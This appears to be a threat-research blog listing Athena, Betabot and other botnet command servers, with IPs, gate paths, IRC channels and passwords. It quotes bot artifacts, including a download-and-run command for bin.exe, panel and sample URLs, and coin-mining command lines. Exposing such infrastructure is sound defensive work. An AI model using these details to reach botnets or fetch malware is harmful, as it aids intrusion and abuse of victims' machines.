Resolved insane.pirate-the.net to 91.234.104.150 Server: insane.pirate-the.net Gate file: /here/gate.php Thanks to whoever uploaded this on malwr Hosting infos: http://whois.domaintools.com/91.234.104.150 Related md5s (search on malwr.com to download the samples): Athena http: e0046f2d10c7c790cf07d258cdafe299
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40 Server: synd1cat3.com Gate file: /kJuN2p/gate.php Hosting infos: http://whois.domaintools.com/192.95.33.40 Related md5s (search on malwr.com to download the samples): Athena http: 88730b35c88269066e191695cf1e148d
mena012.no-ip.biz (Athena and Betabot http botnets hosted by santrex.net)
Resolved mena012.no-ip.biz to 46.166.173.11 Athena http Server: mena012.no-ip.biz Gate file: /gate.php Betabot Server: mena012.no-ip.biz Gate file: /beta/order.php Hosting infos: http://whois.domaintools.com/46.166.173.11
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4 Server: betabros.in Gate file: /beta/order.php The owner should keep a closer eye on the fake forum he setup for cover. 1071 pages of pharmacy spam and counting. Hosting infos: http://whois.domaintools.com/146.0.78.4 EDIT: Bitcoin and litecoin mining. macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p xRead more...
satanic-surfer.biz (Athena http botnet hosted by eternalhost.fr)
Resolved satanic-surfer.biz to 5.39.35.240 Server: satanic-surfer.biz Gate file: /gate.php hxxp://satanic-surfer.biz/panel.zip Hosting infos: http://whois.domaintools.com/5.39.35.240
dictionarysrnifty.no-ip.org (Athena irc botnet hosted by infiumhost.com)
Resolved dictionarysrnifty.no-ip.org to 188.190.99.19 Server: dictionarysrnifty.no-ip.org Port: 9001 * I have 83 clients and 0 servers * 83 451 :Current local users 83, max 451 Channel: #alpha Topic for #alpha is: !botkill.start Topic for #alpha set by LK at Fri Mar 29 10:30:08 2013 All users are also joined to the channel #lobby on connection.Read more...
truboot.org (Athena http botnet hosted by edenhost.com)
Resolved truboot.org to 94.242.205.226 Server: truboot.org Gate file: /at/gate.php This is the http version of the athena irc bot, which has graced this blog many times. Login page located at truboot.org/at/login/index.php Hosting infos: http://whois.domaintools.com/94.242.205.226
xjnhtraj.com (Athena irc botnet hosted by tatacommunications.com)
Server: xjnhtraj.com Port: 6667 Channel: #xjnhtraj Channel password: xjnhtraj Opers: [dwa] (dada@chidaica123): đuawa[dwa] #xjnhtraj [dwa] irc.server.net :IRC server[dwa] is a Bot on IRC server[dwa] idle 00:01:17, signon: Mon Mar 11 15:15:07[dwa] End of WHOIS list. [Troc] (trocdsds@chidaica123): Troc[Troc] #xjnhtraj [Troc] irc.server.net :IRC server[Troc] is a Bot on IRC server[Troc] idle 00:02:11, signon: Mon Mar 11Read more...
filehelp.us (Various irc bots hosted by securedservers.com)
Resolved filehelp.us to 184.95.37.155 Athena Server: filehelp.us Port: 7200 Channel: #Athena Insomnia Server: filehelp.us Port: 4242 Channel: #insomnia Channel password: k6geyzs Dixie bot Server: filehelp.us Port: 4242 Channel: #DDoS# hxxp://filehelp.us/Panel/gate.php aryan bot 184.95.37.155:5557 Server Password: Username: 5644413 Nickname: New{DE-XP-x86}5644413 Channel: #aryan (Password: k6geyzs) Channeltopic: :.dl hxxp://filehelp.us/upload/files/bin.exe 1 Other samples here hxxp://filehelp.us/upload/ Opers are Vapor andRead more...
filestorage.ws (37.221.170.221) (Athena irc botnet hosted by voxility.net)
Resolved filestorage.ws to 157.101.50.101 => Athena l33t ip decryption => 37.221.170.221 Athena now comes with a tool to crypt the server ip so that the address the domain points to is not the correct one. A disgruntled customer has already released the crypting program so anyone who doesn’t have access to a binary can tryRead more...